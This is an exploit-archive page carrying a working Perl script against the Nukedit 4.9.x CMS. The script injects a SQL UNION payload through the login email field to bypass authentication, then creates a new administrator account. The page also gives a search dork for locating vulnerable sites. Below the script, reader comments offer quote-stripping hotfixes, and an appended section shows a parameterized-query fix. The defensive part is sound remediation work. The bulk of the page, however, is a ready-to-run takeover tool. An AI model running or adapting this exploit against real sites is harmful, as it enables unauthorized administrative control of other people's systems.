Nukedit 4.9.x Remote Create Admin Exploit
Tuesday, 26 February 2008

Author: r3dm0v3
Date: 2008-02-26

#!/usr/bin/perl
###########################################################
#Title:       Nukedit 4.9.x Create Admin Exploit          #
#                                                         #
#Credit:      r3dm0v3                                     #
#             http://r3dm0v3.persianblog.ir               #
#             r3dm0v3[4t]yahoo[dot]com                    #
#             Tehran - Iran                               #
#                                                         #
#Download:    http://www.nukedit.com/content/Download.asp #
#Vulnerables: 4.9.x, prior versions maybe affected.       #
#Remote:      Yes                                         #
#Dork:        "Powered by Nukedit"                        #
#Fix:         Not Available                               #
###########################################################
 
use LWP::UserAgent;
use HTTP::Cookies;
 
 
$host = $ARGV[0];
if (substr($host,length($host)-1,1) ne "/"){
    $host.="/";
}
$usrmail = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
$usrSQL= "' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x";
 
 
&Banner();
if (@ARGV < 3) {
&Usage();
exit(1);
}
 
 
print "[~] Host: $host \n";
print "[~] Email/Password: $usrmail/$passwd\n";
print "[~] Logging in...\n";
 
 
$xpl = LWP::UserAgent->new() || die;
$cookie_jar = HTTP::Cookies->new();
 
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'utilities/login.asp',
Content => [
"redir"        => "/nukedit/default.asp",
"email"        => "$usrSQL",
"password"     => "r3dm0v3",
"savepassword" => "false",
"submit"       => "Login",
],);
 
 
 
if ($res->content =~ /Object Moved/){
    print "[+] Logged in\n";
}else{
    print "[-] Can not login!\n";
    exit();
}
 
 
print "[~] Creating Admin...\n";
 
 
$res = $xpl->post($url.'utilities/useradmin.asp',
Content => [
"action"          => "addDB",
"username"        => "r3dm0v3",
"company"         => "red move",
"url"             => "http://r3dm0v3.persianblog.ir",
"address"         => "a",
"county"          => "b",
"zip"             => "666",
"country"         => "Iran",
"phone"           => "66666666",
"fax"             => "12345678",
"email"           => "$usrmail",
"password"        => "$passwd",
"groupid"         => "1",
"submit1"         => "Add User >>",
"IP"              => "127.0.0.2",
],);
 
 
if ($res->content =~ /Object Moved/){
    print "[+] Admin added. Login info:\n".
          "    email:    $usrmail\n".
          "    password: $passwd\n";
}else{
    print "[-] Exploit failed!\n";
    print $res->content;
}
 
 
 
sub Banner{
print "############################################################\n".
      "#            Nukedit 4.9.x Create Admin Exploit            #\n".
      "#                       by r3dm0v3                         #\n".
      "#                  r3dm0v3[4t]yahoo[.]com                  #\n".
      "#               http://r3dm0v3.persianblog.ir              #\n".
      "############################################################\n";
}
 
 
sub Usage(){
print "\n Usage: nukedit.pl <host&path> <email> <password>\n";
print " ex.  : nukedit.pl site.com/nukedit/ myname\@somewhere.com 123456\n";
}
 

Comments (6)
Hotfix for this Problem
written by Roger , April 07, 2008
I developed a hotfix for this issue:

Replace the code in login.asp
OLD CODE
*******************************************
if(len(email) > 0) then
set rsCheck = db.execute("select * from tblUsers where email = '" & email & "'")
if(not rsCheck.EOF) then
if (password=rsCheck("password")) then
NEW CODE
*******************************************
if(len(email) > 0) then
email = replace(email, "'","")
email = replace(email, ",","")

set rsCheck = db.execute("select * from tblUsers where email = '" & email & "'")
if(not rsCheck.EOF) then

if (password=rsCheck("password") and (email=rsCheck("email"))) then

Greetings Roger
Votes: +1
...
written by gurpal , April 08, 2008
Thanks for the hotfix, hopefully it should work.
regards
and thanks again
Votes: +0
...
written by gurpalsc , April 08, 2008
thanks for the hotfix
Votes: +0
...
written by Brad , April 08, 2008
Thanks a million for this. There are hotfixes but they don't seem to do the job... Hopefully this stops the buggers from screwing me weekly.

Thanks again

Votes: +0
...
written by Mike , April 15, 2008
You may find that your hotfix doesn't stop the password field from having SQL injected into it. This is what I wrote and stuck in the same place as the guy lists above. In my code I'm protecting both the Email and the Password fields.

'************ SQL Injection fix

'********* removing any errant ' in the fields as these could be SQL injection attempts.

email = replace(email,"'","")
email = replace(email,"""","")

password = replace(password,"'","")
password = replace(password,"""","")

'removing ' and " (a literal " inside a VBScript string is written as "")

' ********* end of sql injection fix

if(len(email) > 0) then
Votes: +1
...
written by Roger , April 21, 2008
But i think to protect the password is not needed because it's not used in the SQL-Execute statement.
Right?
Votes: +0
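As an added example (not Nukedit's code, nor Roger's or Mike's hotfix above), the same login lookup written with a parameterized ADODB.Command: the email value is bound as a parameter instead of being concatenated into the SQL text, so quotes, commas or a UNION inside it cannot alter the statement, and stripping characters from email or password is no longer needed. It assumes the site's ADO connection string is available in a hypothetical connStr and that tblUsers has the email and password columns used in the hotfix.

```vbscript
' Added example, not Nukedit's own code: login check with a bound parameter.
' Assumes connStr (hypothetical) holds the ADO connection string.
Option Explicit

Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

' Returns True only when a tblUsers row matches the submitted email exactly and
' its stored password value equals the submitted one. The comparison stays in
' VBScript, as in the original login.asp; only the lookup changes.
Function CheckLogin(connStr, email, password)
    Dim conn, cmd, rs
    CheckLogin = False
    If Len(email) = 0 Or Len(email) > 255 Then Exit Function

    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open connStr

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' The ? placeholder is filled by the driver; the user value never becomes SQL text.
    cmd.CommandText = "SELECT email, password FROM tblUsers WHERE email = ?"
    cmd.Parameters.Append cmd.CreateParameter("email", adVarChar, adParamInput, 255, email)

    Set rs = cmd.Execute
    If Not rs.EOF Then
        ' VBScript's = on strings is a binary (case-sensitive) comparison.
        If password = rs("password").Value And email = rs("email").Value Then
            CheckLogin = True
        End If
    End If

    rs.Close
    conn.Close
End Function

' Usage in login.asp, replacing the db.execute lookup shown in the hotfix.
Dim connStr, email, password
connStr = Application("connStr")   ' placeholder: wherever the site keeps its connection string
email = Request.Form("email")
password = Request.Form("password")
If CheckLogin(connStr, email, password) Then
    Response.Redirect "default.asp"
Else
    Response.Write "Login failed"
End If
```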